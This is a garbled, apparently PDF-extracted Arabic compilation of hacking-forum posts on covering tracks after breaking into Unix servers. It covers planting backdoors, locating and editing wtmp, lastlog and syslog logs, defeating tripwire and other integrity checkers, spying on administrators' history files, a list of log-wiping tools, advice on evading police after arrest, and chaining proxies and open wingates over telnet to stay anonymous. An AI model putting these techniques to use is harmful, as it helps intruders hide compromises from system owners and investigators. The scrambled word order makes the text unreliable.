االتي بعمل التقوم معين telnet http://www.host.com/ 23 : سيرفرهي و البطيئه الخطوات اتبع ببساطه انما
telnetopen
http://www.host.com/هكذا .. و
عليه تضع ان االفضل من معين سيرفر اخترقت انك حالة فيbackdoors التشغيل لنظام و ) هههههههههه sub7 مش ( مخصصه
االنترنت على مجانا موجوده و كثييره هي
مالحظتها : يجب يتي الي الحديثه التقنيات الرابع الجزء===============================
تمهيد -*******
اول ثبت ان تعرف .. sniffer بعد ان عليك االختراقات لبدا خططت ويلي ما متعبا التقنيات هذه تستخدم : كيف
نوع - اي من اثرك تقفى امنع**********************
كمخترق ) ( وجودك الشبكه مدير االدمين يالحظ انك hacker قد وكيفسيرصدك ... انه هو المهم اليهم هذا لكن المواقع باحد اطحت
معك يتعامل ان يمكن كيف عندها !!! والذي االساليب و االحتماالت كل توضيح سيتم الجزء هذا ففي لذا
تمنعها ان يمكن كيف ايضا و رصدك و تتبعك بها ... يمكن
الشكبه ) ( * مدير على يسهل ان العادي الطبيعي ) admin ( منذلك و شبكته على دخوله عند عليه المخترق كان الذي النظام معرفةهي ) كما لتركها غبي الهاكر كان ان هذا اللوق ملفات طريق عن اما
ال( من او output ال sniffer مناوامر من موجودا netstat او مازال المخترق ان حالة online في
ال تختاج هذا اجل !! GateWay Server من
* A gateway server in between السيرفرات من الكثيير من واحد هذافي السخافه منتهى في تعتبر التي و عليها حساب لك يوجد التي
ال تغيير لتستطيع عليها رووت تكون الن تحتاج انت و االستخدامwtmp and lastlogs
من اكثر استخدام من ان البد انه تبدل gateway server كما ان والكشفعنك يتم ال حتى باستمرار .. بينهم
بال .. باالتصال قم منه ستخترق الذي الشيل و gateway server مناختراقه المراد بالسيرفر تتصل ثم .. من
ل ( >== دائما اللوق root access تحتاج ) لتغييرل انك .. Dialup server باستخدامك حيث المشاكل من الكثيير يجنبك
باشتراك تدخل ان بشرط اللوق ملفات في التعديل عن غنى فيال على فيها تدخل مره كل )= hacked systemمختلففي
بسرفيرات : االتصال على قادر كنت اذا فال dialup ملحوظه كثييرهتستخدم الن الشركات hacking server حاجه بتغير اثرك سيتغير النه
خاللها من تتصل التي المختلفه
اوروبا و االمريكيه المتحده الواليات في للمتواجدين بالنسبهسبق) ( بما قمت ان و حتى المتقدمه الدول ) dialup servers (
هذا سنيين منذ ارشيفات لديهم و تم اتصال كل تسجيل يمكنهم ! عددها
اللوق - ملفات انواع من نوع اي من lOGs ايجاد فيها كان مهما.. تالعب
**************************************************
***حتى اللوق ملفات كل على تعثر ان جدا الضروري و الهام من
ذلك .. يمكن الملفات هذه على العثور و للحصول منها المخفيالطريقتين : بهاتين
باستخدام : - 1 ذلك يمكنك و المفتوحه الملفات جميع على اعثراختصار LSOF برنامج العثور List Open Files هو يمكن ثم من و
فيهم التعديل و عليهمبعد ) ( - 2 من تغيير فيها حدث تغيرت التي الملفات كل عن ابحث
- دخولكبعمل قم دخولك قم touch /tmp/check بعد بعدها find / -newer" و
/tmp/check -print"
نتائج : -< -< بحث التالي الشكل ستاذخ بها سنقوم التي العمليهتعديل -< النتائج مطالعة
ال اماكن على بالتشيك ايضا و /usr/adm االعتياديه log files قمvar/adm/ و var/log/
ال في العمليات تسجيل يتم فانت xx@loghost يعني loghost اذاال .. تخترق ان من البد انه حيث مازق في ملفات loghost هنا لتعدل
اللوقاللوق تعديل محرر logfiles يمكن اي باستخدام ابسطها طرق بعدة
باستخدام text editor كتابه الملف اسطر بعد قم ثم wc او من واخر خالل 10حذف من اسطر : "head -LineNumbersMinus10"
مطروحا ( بالعربي السطور منه 10عدد - head ( برنامج كان ببساطه accouting اذا يمكنك السيرفر على مثبت
الالزم acct-cleaner from zhart استخدام هيعمل هو و
يستخدم النظام كان انت utmpx و wtmpx اذا عزيز االسف فمع ايضالو !!! .. الحاله هذه في للتعامل برنامج اي اعرف على فانا ورطه فيبه ) ( تعلنا ان تنسى ال المبرمجين لالخوه واحد تبرمج ان استطعت
=(
من - syslog configuration and logfile تحقق************************************
ال على البرامج معظم ايشئ syslog function تعتمد لتسجيلخصائصال .. من تتحقق ان فعليك syslogيريدونه
اللوقات كانت على logs فاذا انما الجهاز على فقط hosts التخزنهذه ... اختراق من البد انك فيؤسفني hosts اخرى
ال في syslog ملف /etc/syslog.conf موجود
المثبته - االمن برامج نوعيات من تحقق******************************
الحس ذات المواقع على غالبا الفحصاألمني برامج من العديد توجد . تسمى أداه بواسطه البرامج هذة وتدار العالي يكون cron األمني و
هو الطبيعي أو األفتراضي هي /var/spool/cron/crontabs مكانها والـ . خاصه المدخالت جميع بمتابعه التي Rootتقوم الملفات و
التالي. األمر نستخدم الموضوع من اللسريع للتحقق يستعملها"crontab -l root".
. و المدير حساب على عامله و محمله األدوات هذه ماتكون غالباالـ مجلد في بعضها . ~/bin يكون هناك يكون ان يمكن كما به الخاص
sinnefer نفسالمكان في امنيه ألغراض .موضوعالداخليه الفحوصات هذه مثل في تستعمل الت األدوات من
tiger, cops, spi, tripwire, l5,binaudit, hobgoblin, s3 etc.
من التأكد و األدوات هذه وجود من يتأكد أن المقتحم على ينبغياألقتحام , عمليه تكشف ال أنها من للتأكد ترسلها التي التقارير
عن باألبالغ تقوم لن أنها من للتأكد البرامج هذه مفات تعديل يمكنكبطريقتين, ذلك تنفيذ يمكن و :األقتحام
شويه ) - واسعه عنك باألبالغ يقوم ال لكي برمجيا البرنامج بتعديل قممزيفا( برنامجا أستعمل و بأزالته قم أو دي
الـ - أزاله إلى تضطر تحميله back door قد محاوله و أستعملته الذيأخرى بطريقه
المدراء - وجود من Admins تحقق
**************************** , معرفه تحاول و الموقع على المدراء جميع تجد أن المهم من
أستخدامها يتم التي العاديه .الحساباتالمعلومات هذه لكشف طرق عده :توجد
الملف - بفحص الـ forword. قم مدخالت alias و- الـ تنفيذ sulog أفحصملف في نجحو الذين المستخدمين حدد و
بنجاح su root األمرالـ - ملف لها group أسحب التي المجموعات جميع عن أبحث و
باألداره admin, root, wheel, etc ( عالقه- ملف المدراء passwd أسحب سر لعرضكلمات للمدير بالنسبه
. إلى , أدخل الموقع على المدراء كل معرفه يمكنك هذا كل يعدالخاصه أحدى , ( مجلداتهم أستخدم أستطاعتك عدم حاله في
التاليه المستخدم chid.c, changeid.c األدوات شخصيه و . )ألنتحالالتاليه الملفات لمعرفه history/.sh_history/.bash_historyأفحص
, المدير دور معرفه في هذا يفيدك قد عادة يستعملونها التي األوامر . , بفحصملفات قم مخفيه معلومات أكتشاف أو الموقع على
.profile/.login/.bash_profile الـ أعدادات , aliasلمراجعه تستخدم التي . أن طبعا الطبيعي من و مستخدمه خفيه أمنيه أدوات ماكانت إذا وقد , منها المخفيه خاصه المجلدات و الملفات بفحصكافه تقوم
حقا المفيده بعضاألشياء تجد
checksum checking software************************
البيانات ( checksum برامج خلو من للتأكد تستعمل رقمية قيمة هو . الجمع كشف عملية خالل من تحسب القيمة هذه األخطاء )من
اي حدوث من للتحقق برامج باستعمال ويقمون المدراء بعضبفحص يقوم تغير، اي حدوث حالة وفي الملفات، في تغييرات
اكتشافها ويستطيع الملفاتاالنواع واي التحقق برامج هناك استخدمت مااذا تعرف فكيف
؟ اجلك من تخدم بحيث تعدلها فكيف واذاعرفت استخدمت؟منها واحدة كتابة السهل ومن التحقق برامج من عديدة انواع هناك
البرامج تلك مثل استخدمت اذا ما اكتشاف الصعب من ولكن بنفسكللحماية الملفات علي
فحص عملية ب تقوم التي البرامج بعض اسماء checksum هذهSOFTWARE : STANDARD PATH : BINARY FILENAMES
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscanhobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pll5 : compile directory : l5
قواعد او نفسه البرنامج ربما كثيرة، احتماالت هناك تري كماجزء مثل آخر، جزء علي يوجد ، NTFS البيانات آخر جهاز او لمضيف
معلومات تحمل التي بيانات قواعد حتي جهاز checksum او فيالكتابة علي ... ) مثال CD اقراص ( محمي
البرامج لمعرفة سريع فحصاستطالعي بعملية القيام يمكنك ولكن
ولكنك شي تجد لم واذا ففرصتك، تستخدم لم واذا ، المستخدمةان يعني هذا البرامج من االنواع لتلك استخدامهم من متاكدا كنت
تعبث ) ( ال ان ويجب لك هارد جيدا بشكل محمي المزود او الموقعابدا .. بالملفات
وبامكانك البرامج تلك يستخدمون انهم اكتشفت اذا ماالعمل ولكنتغييرها؟؟
ما - 1يمكنك ملف تغيير تم بانه شرعي بطرق البرنامج تلك ايهام مثال البيانات قواعد تحديث ويتم قانوني tripwire -update" بشكل
/bin/target".
اسم - 2 وتزيل فحصها يجب التي الملفات قائمة تغيير يمكنكللتحقق اخري مرة فحصها يتم فال القائمة من المراد ( الملفات
يتم ال نفسها البيانات قواعد ملف ان ايضا تتاكد ان يجب ولكنب بها checksum فحصها قمت التي التغييرات اكتشاف يتم ال ) حتي
االمنيه - المستخدم حيل*******************
شملت الكون فقط كتبتها لكنني تستخدم او توجد ندر ما الحيل هذهيسمون ) ( .. المستخدمين فبعض الموضوع لكمال شئ كل
اي admins اشتراكاتهم ملفاتهم في يعبث ان يريدون ال بالطبع وال ملفات في الحيل بعض بعمل فدائما startup شخصفيقومون لذامن تبدا ) profile, .cshrc, .login, .logout. تحقق التي الملفات اي الخ
بنقطه (
الخامس : الجزء=========
المراقبه؟ تحت وضعت ان تفعل ماذا***************************
او ) ( الشرطه قبل من المراقبه الميكروسكوب تحت اصحبت متىال حتى administratorsحتى سريعه و هامه بخطوات القيام عليك
عليك ) ( برهان بدليل االمساك اليستطيعو
ال : - اعتقاد في كان ان فانت hacker انك administrators ملحوظهبراته==< تثبت حتى مذنب ...
لل شئ اي القانون يوجد ( admins اليعني ال انه اعتقد بعضاالوقاتال بين ال hacker فرق هو administrator و الكومبيوتر مالك بان االفورا ) فقط administrator ال فانك هاكر انك يعتقدون عندماو .. اللكتروني بريدك بمراقبة مباشرة سيقومو مذنب اصبحت
االخرى هجماتك ايضا سيرصدك االدمين محترف كان ان و .. ملفاتكيمكنهم ببساطه اكيد االتصاالت هذه كل مراقبة يمكنهم كان اذا
تيليفونك خط .. مراقبةحتى .. ان و اخترقاتك اخبار فيها اتصاالت باي القيام عدم فعليك لذا
اذا ) اال الكتروني ببريد او هاتفيا تخبرهم فال اصحابك تحذر ان اردت.. ) لوجه وجها تقابلهم عندما تخبرهم ان االفضل من و مشفرا كان
عاديه غيير رسائل اي راسال من تمنعهم .. وشهر من االقل على الحال هذا على تبقى ان عليك نفسك لتؤمن
بها .. الترغب انك اعتقد مشاكل ستواجه اال و شهرين الى
السادس : الجزء=========
حالة في به القيام عدم من البد الذي ايضا و به القيام عليك الذي ماالقبضعليك تم :انه
**************************************************
************** على : !!!! : ترد و انت تتذكى بان تحاول ال فورا محاميك اطلب اوال
يطلعك .. و هو عنك يدافع كي محاميك فاطلب بمفردك التحقيقما .. غالبا بعدها نهائيا تذكره ال ان يجب ما و تذكره ان يجب ما على
بحجة ) ( سرعه باقصى الكومبيوتر جهازك المحامي سيطلبو الماديه االعباء جميع تحميل عليهم اال و العمل في احتياجهمن .. فانه لذا الجهاز استخدام عدك عن تحدث قد التي المشاكلتقع ان قبل وقت اي في جاهز محامي عندك يكون ان جدا العملي
التدوير و البحث في تبدا بعدها الراسو الفاسفيمعلومات : !!! : اي للشرطه التعطي الشرطه اال تتكلم ال ابدا ثانياسيخرجك و عنك العقاب سيخفف هذا ان بحجة زمالئك عن او عنك
يجب .. .. كان ان و اكثر سيدينك بل يفيدك لن هذا الن المازق منايضا ) هذا و محاميك خالل من فقط هذا يتم ان فاطلب استجوابك
حقوقك ( من حقايضا .. انما الشهامه من كنوع ليسققط اصدقاؤك عن ابدا التخبر
تزيد ثم من و الموضوع دائرة ستتسع الموضوع في اصحابك بدخولايضا هم و جرائمك عن و عنك ! المعلومات
تشفير فك الشرطه تستطع لم اذا انه قانونها ضمن من الدول بعضعدم الحريه بمنتهى فيمكنك ديسك الهارد من جزء او ملفاتك
عنها االفصاحالمصيده في وقعت مادامت انه قانونها في االخرى الدول بعض لكن
باستشارة انصحك الحاله هذه في شئ بكل لهم تدلي ان البدمشفره اقراصصلبه اي لديك انك انكار و محاميك
السابع : الجزء========
االختباء و للتخفي البرامج بافضل : قائمه******************************
Change - Changes fields of the logfile to anything you wantDelete - Deletes, cuts out the entries you want
Edit - real Editor for the logfileOverwrite - just Overwrites the entries with zero-value bytes.
Don't use such software )f.e. zap( - it can be detected!---------------------------------------------------------------
LOG MODIFIER++++++++++
ah-1_0b.tar Changes the entries of accounting informationclear.c Deletes entries in utmp, wtmp, lastlog and wtmpxcloak2.c Changes the entries in utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so
it's better than zap. Watch out, there are numerous inv*.c !marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!
wzap.c Deletes entries in wtmpwtmped.c Deletes entries in wtmp
zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
--------------------------------------------------------------------------------------الثامن : الجزء
=========ختاميه كلمه
**********اعرف .. .. مفتوحان عيناك اجعل دائما عليك يقبضون ابدا التدعهم
ال من و تثق من !! فيحولك ) ( من كل تذكر ايضا انما فقط نفسك في التفكر
امنه و ممتعه بحياة للجميع .. تمنياتي،،،انتهى14.
15." ) ؟؟ ) األول الجزء النت في الهوية مجهول تبقى " كيف> إعصار منتدى من >منقول
> المدمر: >الكاتببتعليمكم أقوم سوف الموضوع هذا في
ماهو؟Proxy - Sock Host - Wingate
-) في هويتك الكشفعن صعوبة من للزيادة استخدامهم وكيفية-)النت
التخفي في تساعدك أيضا بسيطة أدوات مع
++++++++++++++++++++++++++++++++++
Introduction to Proxy Server=) إلى الوكيل: proxy server الدخول خادم =)أي
proxy server ) الوكيل خادم )خادم بتنزيله server هو ما أحدا ليقوممايفعله اإلنترنت على جهاز أي أو المواقع مع لإلتصال نظامه على
الوكيل بخادم االتصال هو proxy server أوالالشبكات في مايستخدم غالبا لكن إجباري غير لكنه
LAN:مثلLocal Area Network
باإلنترنتخالل اتصالك عند محلية إنترنت جميع proxy server شبكةكل وقبل أوال المستخدم البروكسي هذا إلى تذهب سوف اتصاالتك
كمثال بها إتصال تعمل أن تريد التي األجهزة على تتوزع ثم شيءاستخدام خالل من باإلنترنت تتصل أن أردت وتريد proxy server إذا
كهذا موقعا وتفتح تتصفح أنhttp://hackergurus.tk/
هذا من بالطلب أوال يقوم proxy server عليك proxy server ثمالصفحة بطلب
http://hackergurus.tk/الخادم حسابها server إلى في وتخزينها تحميلها ثم ومن الموقع
: تستعرضها أي الصفحة وتعطيك تمدك سوف ذلك ...بعدتأخذ العملية هذه باإلتصال bit أليست مقارنة أطول وقت في بسيط
) الموقع ) خادم من الصفحة بطلب فقط يكلفك الذي العادي المباشر
واستعراضها بسهولة تحميلها جاري ثم ومنباإلنترنت اتصالك يصبح سوف سيرفر للبروكسي استعمالك مع لكن
تقوم صفحة كل ألن وذلك المباشر االتصال مع مقارنة بطيءأي البروكسي خادم إلى تذهب تستعرضها أي proxey بتحميلها
server التصفح عملية يثقل وهذاتصبح وقد وحدة حالة كيف lucky وهناك قل بعضاألحيان
واستعرضنفس البروكسي نفس باستخدام الشخصقام إذاالشخص هذا استخدمه الي البروكسي استخدمت وانت الصفحات
سريع البروكسي يصبح راح استعرضها الي الصفحة واستعرضت!ليه؟
الصفحات وعرض البروكسي باستخدام قام الي الشخصاألول ألنإلى حملت نفس proxy server الصفحة لديك كان إذا بالك فما
ألن سريع يكون سوف تسعرضنفسالصفحة وحبيت البروكسيفهمت download الصفحة #.. جاهزة
استعرضصفحة الواحد اذا مثال مهم الوقت ياأخواني وأيضاقبل من البروكسي 10ببروكسي نفس استخدمت وانت أيام
ألن يومين في عرضها اذا غير نفسالصفحة proxy واسعرضتserver تالحظ أحيانا كذا علشان القديمة على الحديثة المواقع يقدم
عمل ماعليك كل البروكسيات في تأخرأو&@#&@#&@#&@#&@#&@#&@# Reload
Why use a Proxy Server=) سيرفر؟ البروكسي نستمعل =)لماذا
البروكسي خادم مادام يسئلوني الي األخوان على اجاوب راح وانامالدافع إذا السرعة من والتقليل التحميل إبطاء بعملية يقوم
؟ !!!الستخدامهاإلنترنت: خدمة مزودين أن هو الجواب
ISPInternet Service Provider
الستعراض السماح عدم قفصوهو في وبوضعك بالتحديد يقومونالخدمة مزود قبل من عليها الموافقة تم التي إال الصفحات وتحميل
على للحفاظ المواقع بتقليل لتوفير Traffic ويقومون الخاصبهملمشتركينهم البروكسي استخدام في السرعة
استعراضأي proxy server أما في الكاملة الحرية لك يجعل سوفمن للزيادة أو للحفاظ وهو للبروكسي آخر وسبب كان مهما موقع
لو يعني االتصال عمليات من عملية بأي قيامك أثناء مجهوال بقائكوذلك اصطيادك الموقع خادم على يصعب راح بروكسي استخدمتيأخذ وهو ip ألنه خالله من الموقع اتصل وهو ip الذي البروكسي
الموقع خادم مع يتصل الذيوذلك بك االسقاط محاولة صعوبة من الزيادة تستطيع وأيضا
هذا أن أعلم لكن مختلفة منافذ ذات بروكسيات عدة باستخدامتستخدم ان حاول لذلك االتصال سرعة من بتقليل يقوم سوف
proxy و port يكون حتى تعيشفيها التي منطقتك إلى قريبينproxy server سرعة تفوق وأحيانا السرعة تزداد سوف وبذلك قريب
مارأيك الخدمة بمزود الخاص بروكسي سرعة ).. !!البروكسيمايكروسوفت ببروكسيات تنخدعوا أن ياأخوان إياكم للجميع تحذير
استخدم يقول كأن إعالن من لها وضع مهماcach.microsoft.com 80بمنفذ
المميزات بهذي بروكسي تالقي ماتصدق انت وطبعاالتصفح -1 سريع
المواقع -2 جميع يفتحوقوي -3 جدا عالي التحميل
؟ لماذا تعرف هلوهذا سيرفر البروكسي هذا العالم حول المستخدمين أكثر ألن
جدا خطيرتحركاتك جميع بمعرفة يقوم سوف سيرفر البروكسي هذا الن
ملفات في Logs وحفظها
Introduction to Wingate=) إلى اإلدخال أو =)Wingate الدخول
؟ الحقيقي معناه نعرف هل لكن عنه مانسمع كثيرا؟ WinGate ماهو
بروكسي proxy server firewall هو خادم وهو البروكسي يفوق أيالمختصة البرامج من وضخمة كبيرة حزمة على يحتوي ناري حاجز ذو
تبقيك والتي ( Anonymously بالحماية الهوية )مجهولاتصاالت من بعدة أو واحد بفرد بالمشاركة بالسماح تقوم التي
بالكامل كمبيوتر بشركة اإلنترنتبواسطة مشارك يكون اإلنترنت أنواع WinGate اتصال لعدة تقريبا
:تشمل-------------------------------------------------------------------------------------------
dial up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits
-------------------------------------------------------------------------------------------wingate
كومبيوتر مع اتصاالت يعمل حيث سيرفر البروكسي مع متشابهالمنفذ خالل آخر اتصال , 23لسيرفر هو الحقيقة في Telnet .
the wingate أو اإلنترنت دخول الشبكة أيشخصعلى يجعل سوفبين . وفق سيئة بصورة أخرى لمواقع به وعدم wingate االتصال
)المدير( Aminstrator كفاءةمن العديد اإلنترنت wingate وهنالك األشخاصعلى تجعل والذي
للناسمن , المدخل تحديد من بدال ببعضهم Local Network لإلتصال) المحلية )الشبكة
من شيئ ألي الطريق سوء ICQ - Mirc في ipspoof وفتح إلىالحجم . استغالل
عليه wingate مثال يطلق في open wingates قد مدتها تنتهي وعادةباكتشافه يقوم حتى شهور أو أيام راح )المدير( Admin بضعة وهذا
سوء DIScover يكون من شكاوي يتلقى أو مكشوف يعني ياأخوانيغامضين أعضاء أو !!! استخدام
مستخدمين وضع على القدرة هي للمديرين الوحيدة الفائدةالفوائد تفوق المشاكل ياأخوان لكن نفساالتصال في متعددين
بتنزيل شخصقام أي بشدة WinGate إذا الحذر عليه به خاصأخرى وهنالك آمن بشكل موفق أنه من ويتأكد يفعل ماهو ومعرفة
أكثر برامج WinGate متعددة مثل SyGate أماناملفات الحاالت معظم بالـ )سجالت( Logs في WinGateالخاصة
Server بعد عادة للـ 48تحذف وأيضا لألعمال ساعة ISP's )خاصة )بالكبار
خادم يصادف شيء كل لتدوين موارد أو حاجة اليوجد wingate أي
How do I find Wingates=) على الحصول يمكنني =)؟WinGate كيف
بإمكانك . بالفم كلمة هو الشيء هذا على للحصول طريقة أفضلعنوان الثاني . wingate تاخذ الشيء عنده أحد كان إذا أصدقائك من
برامج تستخدم عليك أقترحWinGate Scanner
في فقط ابحث بالنت منها العديد google هنالكhttp://www.google.com/
مدى وضع هو فعله ماعليك بالبحث hostname او ip كل البدء ثم ومناألوسط الشرق أو الثالث العالم بالد في البحث عليك اقترح مثال
شبكة وأخيرا صفات @home وأفريقيا ولديهم يتشابهون كلهموهي :شائعة
هناك wingates توفر وعادة رديئة بصورة وفق wingate والذيعلى قليل ... حقهم NetWork مفتوح
: Unix خالل والخطأ المحاولة هي طريقة أفضلTrial and Error
بالتلنتفي المنفذ wingate اتصل 23من واحد تحصل راح دخلت واذا والباسوورد االسم فراغ اترك لقيت واذا
ميزة تستخدم او سرك وكلمة اسمك تجربة بإمكانك ( Guest أيضاAnonymously أو )الضيف
Introduction to Socks Host=) إلى اإلدخال أو =)Socks Host الدخول
Socks Host مثل السوكس WinGate تقريبا ان وهو االختالف لكنالمنفذ خالل من وهي 1080يتصل عليها اإلعدادات عمل وبإمكانك
المتصفح في تتوفرexplorer and netscape
إضافة Socks Host وبإمكانكفي كثيرا تستخدم الطريقة وبإخفاء Mirc وهذه بحمايتك ip وتقوم
كـ وتعمل FireWallالخاصبك
**********************الهوية مجهول بقائك على مساعدة برامج وهذه
**********************Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$Stealther
-------------------------------------------اإلنترنت في السابقين البرنامجين عن ابحثوا
--------------------------------------------مجهوال تصبح لن مافعلت وبكل أن الكريم ياأخي أعلم 100لكن %
،،،انتهى
" ) ( ؟؟ الثاني الجزء النت في الهوية مجهول تبقى " كيف> إعصار منتدى من >منقول
> المدمر: >الكاتبوليسكالسابق عملي تطبيق فيه يكون سوف هذا الموضوع ...ألحين
عن الفقرات على Chaining Proxies هذه وسريتك حريتك لبقاءالموضوع هذا ان التظن لكن اتصالك أثناء أطول وقت اإلنترنت
المجهول الشخص تصبح الجانبسوف هذا عن قرأت فكلما كافيعن نتكلم سوف على Chaining wingates وأيضا مجهوال لتصبح
Telnet
-------------------------------------------)يستخدم أغلبكم أن المعروف او ip إلخفاء proxy من به الخاص
Domain المغلقة المواقع يجتاز لكي البروكسي يستخدم قد اوهويته لحماية . وأيضا
تستخدم كيف تتعلم ان عليك ماذا Proxy لكن تعرف ان األفضل ومن,,, أوال Domain و Ip Address هو
تحصل كيف بإرشادك اقوم ان اوال علي الموضوع هذا تقرأ أن قبلالمواقع Proxy على هذه من تحديثها :مع
http://www.multiproxy.org/anon_list.htm http://tools.rosinstrument.com/proxy/
بـ تسجلون إنكم وأنصحكم لكم أفضل طريقة هنالك وهو Groupأومختلفة وبمنافذ جدا جديدة بروكسيات بإرسال يقوم[email protected]:الجروب
التسجيل طريقةالطريقة بهذه للجروب وأرسل حسابك إلى بالدخول قم
اكتب إلى اإلرسال خانة في[email protected]
قم مباشرة رد تتلقى سوف ذلك بعد إليهم فارغة رسالة وأرسل Replay بعمل
بالجروب سجلت لقد مبروك اآلن-------------------------------------------)
=========================أن من التأكد تستطيع به تقوم عمل كل في بمساعدتك أقوم لن أن
إلى بالذهاب يعمل : البروكسيhttp://www.privacy.net/
أوhttp://www.proxytester.com/
عنوان تعرفهل أما !!! Ip وقد األول للموقع بالنسبة هذا ال أم تغيرمستوياتها واعطائك البروكسيات خاصلكشف فهو الثاني .. الموقع
=========================
*************************************
&&&&&&&&&&&&&&proxy server
&&&&&&&&&&&&&&
خادم بين Proxy هو باالتصال يقوم WebSite,IRC Chat,etc(
يستعرض او يستقل لكي طلبات بإرسال تقوم البروكسيات هذهعلى طلبك يرسل البروكسي اإلنترنت على موقعا المستخدم
الموقع تدخل سوف ذلك وبعد الموقع هذا يطلب لكي اإلنترنتفي يخزن سوف وهذا Proxy Server ببروكسي
السابق الموضوع في قلنا ...كما
بالموقع البروكسي طريق عن تتصل كيف توضح هذي[User]<<<<<[Proxy]<<<<<[Web Pages]
----------------Proxy Chaining
----------------مجهوال تصبح لكي جدا فعالة طريقة وهذي بروكسيات عدة معناها
تعرضموقع لكي بروكسي من بأكثر تتصل ان يمكنك حيث الهويةواحد/مثال
[User]<<<[Proxy1]<<<[Proxy2]<<<[Proxy3]<<<[Proxy4]<<<[Destination]
االول بالبروكسي االتصال عليه اوال المستخدم ان المثال هذا يوضحاالتصال في بطأ يسبب مما الهدف وأخيرا والرابع فالثالث فالثاني
Destination = web page, Unix server, ftp server, etcليحفظ Proxy chaining إذا هكر أي يستخدمه لكي مطلبضروري
أي إلى الدخول اثناء telnet, ftp, or http مثل server سريتهChaining مجهوال تصبح لن أقول كما مهمة حاول% 100هي لكن
لكن السمكة مثل ويطادونك تمسك ال ان على المستطاع بقدرتدخل حاولت مثال لكن احدا يكشفها ان صعب المتعددة البروكسيات
بالـ موقع فلوس ftpعلى معاه كان لو كذا بعد البروكسي يصطاد راحمن طلب كان
Adminstrator ملفات Logs راح ايضا والمصدر المصدر يعرف لكيالى proxy يكون يصل ان إلى المنوال هذا على يعني ههههههههه
عملية لذلك ويصعب Chaining Proxy المستخدم جدا مفيدة عمليةبك االمساك احدهم
ملفات البروكسي Logs لكن على الضغط بعد اوقات تنحذففيعلى الملفات تحميل من به المسموح الحد الى يصل لكي
تصبح سوف لذلك البروكسيات على يحتوي الي الخادم البروكسي... متجددة Logs ملفات
----------------HTTP Chaining
----------------HTTP chaining نفسطريقة من Proxy هي عملها ويمكنك
خانة وفي Address مستعرضك:مثال
http://proxy.magusnet.com/-_-http://www.google.com
صحيح )-_-( مسبقا ترونها لم وجديدة جميلة !!! حركةاستخدام يمكننا :مثل Chaining وأيضا
http://proxy.server1.com/-_-http://p...estination.com
بمنافذها بروكسيات عناوين وضع يمكننا او
http://anon.free.anonymizer.com/http://www.google.com
آخر مثال
المواقع )/( بين عالمة كإضافة
http://proxy1/http://proxy2:80/proxy.../www.yahoo.comproxy = لك أفضل يكون رقمي ببروكسي ..... استبدله
----------------Browser Chaining
----------------حديثي يكون سوف وانا متصفحك من البروكسي استخدام وهو
عن استخداما Internet Explorer فقط األكثر ---- ألنهبروكسي عندنا مثال ألحين
213.234.124.23:80213.234.124.23العنوان:
80المنفذ:بالـ الخاص البروكسي بدال نحطها كيف خدمة ISPألحين مزد أي
اإلنترنتعند نروح
Tools أدواتإنترنت Internet Options خيارات
اتصاالت Connections بعدينبعدين االنترنت في تدخل الي االتصال تختار
Settings إعداداتتجد راح
Address )العنوان(Port )المنفذ(
بداله ونضعه:213.234.124.23العنوان: و 80المنفذ موافق اضغط كذا وبعد
المتعدد االستعراض نستخدم نبغى Chaining Proixes والحينمثل واحد من أكثر نحط العنوان في واحد بروكسي مانحط بدال
/كذاAddress: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port:
80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&Wingates
&&&&&&&&&&&&&&Wingate هو proxy server ليسمح جهازها او جهازه في ينزل الذي
خالل بالمنفذ مقاعدهم ليأخذون أفراد بعدة او 23بالفرد منفذ(( Telnet العادي ((
شخصمتصل Wingates بعض ألي به online يسمحون يتصلون لكيليسمن هذا ان اعلم لكن االيام التتعدى قصير وقت في او مباشرةللـ خصائص وهنالك استخدام Adminالقانون من على wingate تمنع
ال أم المجال هذا في يفهم هل المدير حسب على هذا !!!! جهازهعن عبارة على ip وهي خاللها من تتصل أجهزة اسماء أو أجهزة
بأداة 23المنفذ Telnet ببرامج بحث عمل من يمكنك أوWinScanWingate
-------------------------------Chaining Wingates Using Telnet
-------------------------------
عدة نستخدم راح نحتاجها Wingate ألحين التي واألدوات كالسابق
فقط أهم Telnet وأداة DoS هي من تخلو سوف األجهزة أن ألظننادرا إال األداتين ..... هذين
المنفذ wingate جميع طريق عن ليسمهما 23تتصل المنفذ لكن بالـ االتصال يتم كيف فقط تتعلموا لكي لكم أضيفها لكنيسوف
Telnet المنافذ طريق عن
إحضاره امكننا جهاز عنوان وهذا
23ومنفذه 61.133.119.130هو
طريق عن به االتصال :مثل Telnet ويتم
C:\WINDOWS<telnet 61.133.119.130 23 خطوتك تعثر قد ناقصة او زائدة فمسافة المسافات وجود الحظ
هذا مثل جيت بالوين تتصل سوف كذا بعد
Wingate< 203.207.173.166 23
يعني العنوان تغيير مع ولكن مرة من اكثر العملية تكرر تقدر بعدينكذا
Wingate< 213.17.99.45 23
أخرى مرة اتصل وأيضا
Wingate< 10.65.212.7 23
من بأكثر ماتتصل بعد بالموقع wingate ألحين اتصل
WinGate<arbornet.org
كذلك تبدو سريعة وبخطوة الطريقة اذا
C:\Windows< telnet 61.133.119.130 23
Wingate<203.207.173.166 23
Wingate<135.245.18.167 23
Wingate<m-net.arbornet.org Connecting to host arbornet.org...Connected
،،،انتهى
" الـ ملفات األثارمن وإزالة الخصوصية حماية "Logsبين> اإلسالمية الحزم منتديات من >منقول
> الظامي: حزم >الكاتب
يونكس سيرفرات مع االثر تعقب ومنع التخفي بموضوع يتعلق فيماتمنحه . التي خواصيونكس أهم من أن تعلم أن البد أوال لينوكس أو
المستخدمين . تعدد على تقوم Unix Multi-User Mode . القوةOperation . أن تعلم أن بد ال ) Linux ( ثم من المجاني االصدار هو
يونيكس ستتعامل . ) Unix ( نظام يونيكسفحتما فهم األفضل يعنيمع تتعامل كونك ارتياح لينوكسبكل Unix مع
رئيسين لقسمين الموضوع أقسم أريد : أوالساعات تكفي ما الموضوع الن بعجاله منهما واحد كل عن ساتكلم
